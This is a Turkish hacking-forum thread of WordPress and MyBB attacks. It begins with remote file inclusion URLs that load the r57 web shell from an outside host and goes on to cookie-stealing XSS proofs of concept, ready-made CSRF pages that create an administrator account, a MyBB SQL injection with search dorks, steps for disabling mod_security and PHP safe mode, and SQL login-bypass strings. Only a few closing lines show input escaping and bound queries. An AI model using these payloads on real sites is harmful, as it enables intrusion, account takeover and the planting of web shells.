/plugins/spamx/Import.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/staticpages/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://creativerentacar.com/r57.txt?
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://creativerentacar.com/r57.txt?
/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://creativerentacar.com/r57.txt?
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://creativerentacar.com/r57.txt?
/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creativerentacar.com/r57.txt?
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://creativerentacar.com/r57.txt?
Sonra kotu kullanim :
Kod:
http://www.blogismi.com/wp-login.php?action=rp&key[]=
Bunun sebebi :
Kod:
if ( empty($key) )
Fix :
Kod:
if (empty($key)) ||  is_array( $key )
Yani || - veya bu olmazsa ve ya is_array dizinlerinden kullanilmasi gerektir.
Eski XSS acigi :
Kod:
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Comment Deleting :
Kod:
http://target.tld/wp-admin/comment.php?action=
Control the comment.php
2.6.5 XSS (PoC)
Kod:
PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&s =% 27 [XSS]
PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&ip_address =% 27 [XSS]
SQL Acigi :
Kod:
http://www.exploit-db.com/exploits/18039/
Yukaridan okuya bilirsin )))
Dizinlar boyle olur :

Ve her seyden once phpmyadmin yedekleyin onun icin bigdump.php dosyasi download link :
http://www.ozerov.de/bigdump.zip
Ve baslayalim :
Orjinal Boyutunda Açmak İçin ( 814x625 ve %3$sKB ) Buraya Tıklayın

Orjinal Boyutunda Açmak İçin ( 1025x738 ve %3$sKB ) Buraya Tıklayın

Orjinal Boyutunda Açmak İçin ( 1025x738 ve %3$sKB ) Buraya Tıklayın

Orjinal Boyutunda Açmak İçin ( 1025x738 ve %3$sKB ) Buraya Tıklayın


iste Boylece yedeklenir. ve konumuz aciklardi :
http://www.exploit-db.com/exploits/18276/
http://www.exploit-db.com/exploits/18330/
http://1337day.com/exploits/17326
http://www.exploit-db.com/exploits/18350/
http://www.exploit-db.com/exploits/18353/(Blind SQL O.o)
http://www.exploit-db.com/exploits/18355/

Gorduyun gibi WP en guvenilir dediniz bakin gorun neleri var )))
Ve WordPress v3.3.1-de bulunan CSRF inanilmaz bunlarla neler yapilir bu CSRF-le neler yapila bilir :
Kod:
# Admin Ekleyebilme 
# Admin Silebilme 
# Yorum onaylama, silme 
# Site basligini degistirebilme 
# Admin mailini degistirebilme ve site adresi ile oynama
Kod:
&lt;html&gt;
 &lt;body onload="javascript:document.forms[0].submit()"&gt;
 &lt;H2&gt;WP 3.3.1 CSRF konu degistirme Author : Hptimi&lt;/H2&gt;

 &lt;form method="POST" name="form0" action="http://&lt;wordpress_ip&gt;:80/wp-admin/admin-ajax.php"&gt;
 &lt;input type="hidden" name="post_title" value="Hacked Bla bla...."/&gt;
 &lt;input type="hidden" name="post_name" value="Hacked hptimi blala...."/&gt;
 &lt;input type="hidden" name="mm" value="03"/&gt;
 &lt;input type="hidden" name="jj" value="16"/&gt;

 &lt;input type="hidden" name="aa" value="2012"/&gt;
 &lt;input type="hidden" name="hh" value=""/&gt;
 &lt;input type="hidden" name="mn" value=""/&gt;
 &lt;input type="hidden" name="ss" value=""/&gt;
 &lt;input type="hidden" name="post_author" value="1"/&gt;
 &lt;input type="hidden" name="post_password" value=""/&gt;

 &lt;input type="hidden" name="post_category%5B%5D" value="0"/&gt;
 &lt;input type="hidden" name="post_category%5B%5D" value="1"/&gt;
 &lt;input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/&gt;
 &lt;input type="hidden" name="comment_status" value="open"/&gt;
 &lt;input type="hidden" name="ping_status" value="open"/&gt;
 &lt;input type="hidden" name="_status" value="publish"/&gt;

 &lt;input type="hidden" name="post_format" value="0"/&gt;
 &lt;input type="hidden" name="_inline_edit" value="&lt;sniffed_value&gt;"/&gt;
 &lt;input type="hidden" name="post_view" value="list"/&gt;
 &lt;input type="hidden" name="screen" value="edit-post"/&gt;
 &lt;input type="hidden" name="action" value="inline-save"/&gt;

 &lt;input type="hidden" name="post_type" value="post"/&gt;
 &lt;input type="hidden" name="post_ID" value="1"/&gt;
 &lt;input type="hidden" name="edit_date" value="true"/&gt;
 &lt;input type="hidden" name="post_status" value="all"/&gt;
 &lt;/form&gt;
 &lt;/body&gt;

 &lt;/html&gt;
URL Decoder-le editlersiniz
Bununla konu basligi deyisdirilir. Admin Ekleme :
Kod:
&lt;html&gt;
 &lt;body onload="javascript:document.forms[0].submit()"&gt;
 &lt;H2&gt;WP 3.3.1 CSRF Admin ekleme Author : Hptimi&lt;/H2&gt;

 &lt;form method="POST" name="form0" action="http://&lt;wordpress_ip&gt;:80/wp-admin/user-new.php"&gt;
 &lt;input type="hidden" name="action" value="createuser"/&gt;
 &lt;input type="hidden" name="_wpnonce_create-user" value="&lt;sniffed_value&gt;"/&gt;
 &lt;input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/&gt;
 &lt;input type="hidden" name="user_login" value="hptimi"/&gt;

 &lt;input type="hidden" name="email" value="admin@hptimi.com"/&gt;
 &lt;input type="hidden" name="first_name" value="admin@hptimi.com"/&gt;
 &lt;input type="hidden" name="last_name" value=""/&gt;
 &lt;input type="hidden" name="url" value=""/&gt;
 &lt;input type="hidden" name="pass1" value="password"/&gt;
 &lt;input type="hidden" name="pass2" value="password"/&gt;

 &lt;input type="hidden" name="role" value="administrator"/&gt;
 &lt;input type="hidden" name="createuser" value="Add+New+User+"/&gt;
 &lt;/form&gt;
 &lt;/body&gt;
 &lt;/html&gt;
100% secure yoktur & Respect! ^_^ Peace!  
Topic : http://www.millikuvvetler.net/showthread.php?t=8539

MyBB 1.6.8 SQL Injection Vulnerable (Author : Mr.XpR)

FlipRoot ,
Qocum sende her seye takilma Just ReLaXxX)
Simdi MySQL acigina gelelim. En berbad kurulumlardan 1-ide MyBB-dir. Ve Bu SQL Injection onceden bulunmusdu. Mr.XpR tarafindan. Guzel Vulnerable.
Kod:
-------------------- IN The NAme OF God --------------------


-====MyBB 1.6.8 Sql Injection Vulnerability====-

# Exploit Title: MyBB 1.6.8 Sql Injection Vulnerability
# Exploit Author: Mr.XpR
# Tested on: BackTrack
# Script Site : http://mybb.com
# MAil : No0PM[at]yahoo[dot]com

-====Dork====-

inurl:member.php?action=profile&uid=

inurl:action=profile&uid=27

-====Exploit====-

http://www.Site.com/forums/member.php?action=profile&uid=[Sqli]

-====Example====-

http://www.mihanhack.com/forums/member.php?action=profile&uid=9

http://www.mihanhack.com/forums/member.php?action=profile&uid=9'


-====information====-

MyBB has experienced an internal SQL error and cannot continue.

SQL Error:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
Query:
    SELECT * FROM mybb_adv_ratings WHERE fuid='9'' AND uid='0' 

-====Tnx To====-

Just Persian Gulf ~~~~ > W3 Are Persian Hackerz

MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN 

Yaghi.Vahshi - HELLBOY - IrIsT - Black King - Monfared - Sokote_Vahshat ...

And All IraNHAck Security Team Members

iranhack.***
http://packetstormsecurity.org/files...Injection.html
Gorduyunuz gibi seninkide denk gelmis oldu. Paylasim icin tesekkurler )))))

Re : safe mod off yapma yardım .! (MKT)

Simdi bypass yollari vardir. Ve ya direk ini.php / .htaccess / php.ini -den degistirirsin.
.htaccess-i aciyoruz:

Kod:
<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>
Ekliyoruz.
ini.php :
Kod:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursans ursansur93;
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansur sansur93;
?>
php.ini
Kod:
safe_mode = off
exec = On
shell_exec = On
Ve ya Bypass yapariz.
PHP 5.2.13 -du versionlarda hem Bypasing Safe Mode + Disable Function's
Bunun icin r57 upload ediyoruz asagidaki gibi yapiyoruz ve Create
Orjinal Boyutunda Açmak İçin ( 1023x343 ve %3$sKB ) Buraya Tıklayın

Yaptigimizda Safe Mode = OFF ve Disable Function = NONE
Basarialr & Respect!! ^_^
Topic : http://www.millikuvvetler.net/showthread.php?t=8512

Re : MyBB 1.6.8 Açığı // FlipR00T [MKT]

Yada boyle 1 sey ola bilir.
Simdi bildigin uzere bazi SQL-lerde post limiti olur. Yani Mesela 1 site hacklarsin ordan mass yapmak istersin index-in icinde milyon tane resim vardir yuklenmesi traffigi azaldir. Oylece MySQL down-a gider. Yani buldugun site varde 'S ile kayitli olan onun SQL hata vermesi garip degildir. Cunki asagiad 1 ornek :

Kod:
if (isset($_GET["article_id"])) { $sql->query(‘SELECT ‘ . TABLE_ARTICLES . ‘.article_date, ‘ . TABLE_ARTICLES . ‘.article_subject, ‘ . TABLE_ARTICLES . ‘.article_text, ‘ . TABLE_USERS . ‘.user_id, ‘ . TABLE_USERS . ‘.user_name FROM ‘ . TABLE_ARTICLES . ‘, ‘ . TABLE_USERS . ‘ WHERE ‘ . TABLE_ARTICLES . ‘.user_id = ‘ . TABLE_USERS . ‘.user_id AND ‘ . TABLE_ARTICLES . ‘.article_id = ‘ . $_GET["article_id"]); $table_articles = $sql->fetch();
Gorduyun gibi TABLE_ -lerde hepsi Posta girer $table_ -ye esit olmadigi icindir. Ve $_POST-dan kullanmiyoruz $_GET ile direk cagiriyoruz
Kod:
$article_id=mysql_real_escape_string($article_id);
Ve $zararsizkod=$zararlikod bu zaman zararli kod check olunur ve kontrol edilir. ID cagiririz :
Kod:
$query = mysql_query("select * from users where id=".$_GET['id']);
bu select froum user *group_concat*-dan gelir.
Kod:
SELECT * FROM users WHERE id=1 OR 1=1
ID-lleri kontrol edilir. Cok zaman bunu ASP uzerinde denediyimiz zaman 1'or'1='1' Gibi password kecisimiz olur.
Kod:
$username = $_POST['username'];
$passwd = $_POST['passwd'];
 
$query = mysql_query("select * from users where username='$username' and passwd='$passwd' ");
Burda soruyor passwd anlasimi amma orda inputa geciyor direkt yani ctlr+u -nu basib name="login -de logini bulub 'text' yazmak gibi.
Kod:
SELECT * FROM users WHERE username='a' OR 1=1 OR 'b' AND passwd='asdf'
Burda uname=a ve apsswd=asdf bunu biz yalniz MySQL-de goruruz cunki ordan inject edilmis ve md5 halinda gelmesi normaldi MySQL yuksek versionlarinda bu boyle 1 secure kurulmusdur.Bazen base64 bazende sha1 hatta MD5SQL ile bile sifrelenir. Bu sizin MySQL-e kurdugunuz sistemden aslidir.
Magic QUates :
Kod:
SELECT * FROM users WHERE username='a\' or 1=1 or \'b' AND passwd='asdf'
$_POST , $_GET , $_COOKIE ile bakilir
Kod:
$query = mysql_query("select * from users where id=".$_GET['id']);
'or'
Kod:
$query = mysql_query("select * from users where id='".$_GET['id']."'");
mysql_real_escape_string :
Kod:
$_POST['username'] = mysql_real_escape_string($_POST['username']);
$_POST['passwd'] = mysql_real_escape_string($_POST['passwd']);
BIND :
Kod:
require_once '/var/lib/ZendFramework/Zend/Db.php';
$db = Zend_Db::factory('Mysqli', array(
    'username' => 'myuser',
    'password' => 'mypass',
    'dbname' => 'mydbname',
    'driver_options' => array(MYSQLI_INIT_COMMAND => 'SET NAMES UTF8;')
));
 
$user = $db->fetchRow("select * from users where id=?", $_GET['id']);
Orjinal Boyutunda Açmak İçin ( 855x536 ve %3$sKB ) Buraya Tıklayın

Az version-larda
Orjinal Boyutunda Açmak İçin ( 886x412 ve %3$sKB ) Buraya Tıklayın

Orjinal Boyutunda Açmak İçin ( 853x241 ve %3$sKB ) Buraya Tıklayın

Orjinal Boyutunda Açmak İçin ( 919x483 ve %3$sKB ) Buraya Tıklayın


Kod:
$sifre=$_POST['sifre']);
$sifre=mysql_query("select * from yonetici where `id`='$sifre'");
mysql_num_rows($kontrolet)
$_POST-a gelenler
Kod:
$sifre=$_POST['sifre']);
$sifre=mysql_query("select * from yonetici where id='$sifre'");
mysql_num_rows($kontrolet)
$sifre korumasi :
Kod:
$sifre=mysql_real_escape_string(htmlspecialchars($_POST['sifre']));
$sifre=mysql_query("select * from yonetici where id='$sifre'");
mysql_num_rows($kontrolet)
Yani Kanky Koruma Korumadir sadece echo 'hello wordl';
-deki ' isareni silsen hemen online 3-de Cikar . & Respect! ^_^
Avatar Fearless! ^_^